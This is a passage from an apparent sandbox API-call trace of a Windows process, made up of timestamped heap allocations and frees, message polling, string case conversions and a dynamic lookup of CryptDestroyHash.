wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0266.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.463] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.463] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0266.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0266.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ca8 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0266.465] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0266.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0266.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0266.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0266.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.466] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0266.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0266.466] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0266.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.466] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0266.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0266.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.467] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.467] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0266.467] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0266.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.467] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0266.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0266.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0266.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0266.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0266.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0266.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0266.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0266.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0266.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0266.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0266.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0266.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0266.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0266.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0266.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466db0 [0266.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0266.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0266.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0266.471] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0266.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0266.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0266.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.471] CryptDestroyHash (hHash=0xaa59a0) returned 1 [0266.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0266.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0266.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0266.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0266.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0266.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0266.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.474] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0266.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0266.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0266.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0266.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: 